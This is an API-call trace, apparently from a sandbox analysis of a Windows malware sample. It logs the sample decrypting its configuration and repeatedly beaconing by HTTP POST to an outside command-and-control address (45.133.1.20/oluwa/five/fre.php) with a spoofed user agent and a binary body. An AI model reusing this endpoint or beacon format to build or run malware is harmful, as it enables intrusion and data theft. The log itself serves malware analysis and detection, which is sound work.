1 [0224.047] GetProcessHeap () returned 0x6a0000 [0224.047] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0224.048] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.049] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0224.049] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.050] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0224.051] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.051] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0224.051] GetProcessHeap () returned 0x6a0000 [0224.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0224.053] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.053] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0224.054] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.054] CryptDestroyKey (hKey=0x6ad020) returned 1 [0224.055] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.056] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0224.056] GetProcessHeap () returned 0x6a0000 [0224.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0224.057] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0224.057] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0224.058] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0224.058] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0224.059] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0224.060] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0224.060] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0224.061] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0224.061] GetProcessHeap () returned 0x6a0000 [0224.061] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0224.061] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0224.061] GetProcessHeap () returned 0x6a0000 [0224.061] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9a0 [0224.061] socket (af=2, type=1, protocol=6) returned 0x694 [0224.064] connect (s=0x694, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0224.090] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0224.090] GetProcessHeap () returned 0x6a0000 [0224.090] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf058 [0224.090] GetProcessHeap () returned 0x6a0000 [0224.090] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d8710 [0224.091] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0224.092] wvsprintfA (in: param_1=0x6d8710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0224.092] GetProcessHeap () returned 0x6a0000 [0224.092] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0224.092] GetProcessHeap () returned 0x6a0000 [0224.093] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8710 | out: hHeap=0x6a0000) returned 1 [0224.093] GetProcessHeap () returned 0x6a0000 [0224.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0224.093] GetProcessHeap () returned 0x6a0000 [0224.093] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d8710 [0224.094] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0224.095] wvsprintfA (in: param_1=0x6d8710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0224.095] GetProcessHeap () returned 0x6a0000 [0224.095] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0224.095] GetProcessHeap () returned 0x6a0000 [0224.095] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8710 | out: hHeap=0x6a0000) returned 1 [0224.095] send (s=0x694, buf=0x6b5c98*, len=242, flags=0) returned 242 [0224.096] send (s=0x694, buf=0x6bb998*, len=159, flags=0) returned 159 [0224.096] GetProcessHeap () returned 0x6a0000 [0224.096] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0224.096] recv (in: s=0x694, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0224.189] GetProcessHeap () returned 0x6a0000 [0224.190] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0224.190] GetProcessHeap () returned 0x6a0000 [0224.190] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0224.190] GetProcessHeap () returned 0x6a0000 [0224.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0224.191] GetProcessHeap () returned 0x6a0000 [0224.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf058 | out: hHeap=0x6a0000) returned 1 [0224.192] closesocket (s=0x694) returned 0 [0224.193] GetProcessHeap () returned 0x6a0000 [0224.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9a0 | out: hHeap=0x6a0000) returned 1 [0224.193] GetProcessHeap () returned 0x6a0000 [0224.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0224.194] GetProcessHeap () returned 0x6a0000 [0224.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0224.194] GetProcessHeap () returned 0x6a0000 [0224.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0224.200] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x894) returned 0x694 [0224.203] Sleep (dwMilliseconds=0xea60) [0224.205] GetProcessHeap () returned 0x6a0000 [0224.205] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0224.205] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.206] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0224.219] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.219] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0224.230] GetProcessHeap () returned 0x6a0000 [0224.230] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0224.236] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.237] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0224.237] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.238] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0224.239] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.239] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0224.239] GetProcessHeap () returned 0x6a0000 [0224.239] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0224.242] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.244] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0224.245] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.245] CryptDestroyKey (hKey=0x6ad020) returned 1 [0224.246] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.246] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0224.246] GetProcessHeap () returned 0x6a0000 [0224.246] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0224.247] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0224.247] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0224.248] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0224.248] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0224.249] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0224.250] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0224.250] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0224.250] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0224.251] GetProcessHeap () returned 0x6a0000 [0224.251] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0224.251] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0224.251] GetProcessHeap () returned 0x6a0000 [0224.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0224.252] GetProcessHeap () returned 0x6a0000 [0224.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0224.252] GetProcessHeap () returned 0x6a0000 [0224.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0224.252] GetProcessHeap () returned 0x6a0000 [0224.252] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0224.253] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.257] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0224.262] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.262] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0224.271] GetProcessHeap () returned 0x6a0000 [0224.271] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0224.272] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.273] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0224.274] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.274] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0224.275] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.275] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0224.275] GetProcessHeap () returned 0x6a0000 [0224.276] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0224.277] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.277] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0224.277] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.278] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0224.278] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.279] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0224.279] GetProcessHeap () returned 0x6a0000 [0224.279] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0224.279] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0224.280] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0224.280] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0224.280] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0224.281] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0224.281] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0224.282] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0224.282] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0224.283] GetProcessHeap () returned 0x6a0000 [0224.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0224.283] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0224.283] GetProcessHeap () returned 0x6a0000 [0224.283] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab10 [0224.283] socket (af=2, type=1, protocol=6) returned 0x698 [0224.283] connect (s=0x698, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0224.312] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0224.312] GetProcessHeap () returned 0x6a0000 [0224.312] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0224.312] GetProcessHeap () returned 0x6a0000 [0224.312] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d8f18 [0224.312] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0224.313] wvsprintfA (in: param_1=0x6d8f18, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0224.313] GetProcessHeap () returned 0x6a0000 [0224.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0224.314] GetProcessHeap () returned 0x6a0000 [0224.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f18 | out: hHeap=0x6a0000) returned 1 [0224.314] GetProcessHeap () returned 0x6a0000 [0224.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0224.314] GetProcessHeap () returned 0x6a0000 [0224.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d8f18 [0224.315] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0224.316] wvsprintfA (in: param_1=0x6d8f18, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0224.316] GetProcessHeap () returned 0x6a0000 [0224.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0224.316] GetProcessHeap () returned 0x6a0000 [0224.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d8f18 | out: hHeap=0x6a0000) returned 1 [0224.316] send (s=0x698, buf=0x6b5c98*, len=242, flags=0) returned 242 [0224.317] send (s=0x698, buf=0x6bb998*, len=159, flags=0) returned 159 [0224.317] GetProcessHeap () returned 0x6a0000 [0224.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0224.317] recv (in: s=0x698, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0224.417] GetProcessHeap () returned 0x6a0000 [0224.417] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0224.417] GetProcessHeap () returned 0x6a0000 [0224.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0224.418] GetProcessHeap () returned 0x6a0000 [0224.418] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0224.418] GetProcessHeap () returned 0x6a0000 [0224.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0224.419] closesocket (s=0x698) returned 0 [0224.419] GetProcessHeap () returned 0x6a0000 [0224.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab10 | out: hHeap=0x6a0000) returned 1 [0224.419] GetProcessHeap () returned 0x6a0000 [0224.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0224.420] GetProcessHeap () returned 0x6a0000 [0224.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0224.420] GetProcessHeap () returned 0x6a0000 [0224.420] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0224.421] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x678) returned 0x698 [0224.423] Sleep (dwMilliseconds=0xea60) [0224.424] GetProcessHeap () returned 0x6a0000 [0224.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0224.426] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.426] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0224.432] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.433] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0224.445] GetProcessHeap () returned 0x6a0000 [0224.445] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0224.446] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.447] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0224.450] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.451] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0224.451] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.452] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0224.452] GetProcessHeap () returned 0x6a0000 [0224.452] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0224.453] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.454] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0224.455] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.455] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0224.456] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.456] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0224.456] GetProcessHeap () returned 0x6a0000 [0224.456] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0224.507] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0224.508] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0224.509] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0224.509] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0224.510] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0224.510] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0224.511] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0224.512] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0224.512] GetProcessHeap () returned 0x6a0000 [0224.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0224.512] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0224.513] GetProcessHeap () returned 0x6a0000 [0224.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0224.514] GetProcessHeap () returned 0x6a0000 [0224.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0224.515] GetProcessHeap () returned 0x6a0000 [0224.515] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0224.515] GetProcessHeap () returned 0x6a0000 [0224.515] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0224.516] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.516] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0224.538] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.539] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0224.548] GetProcessHeap () returned 0x6a0000 [0224.548] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0224.549] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.550] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0224.551] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.551] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0224.552] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0224.552] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0224.552] GetProcessHeap () returned 0x6a0000 [0224.553] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 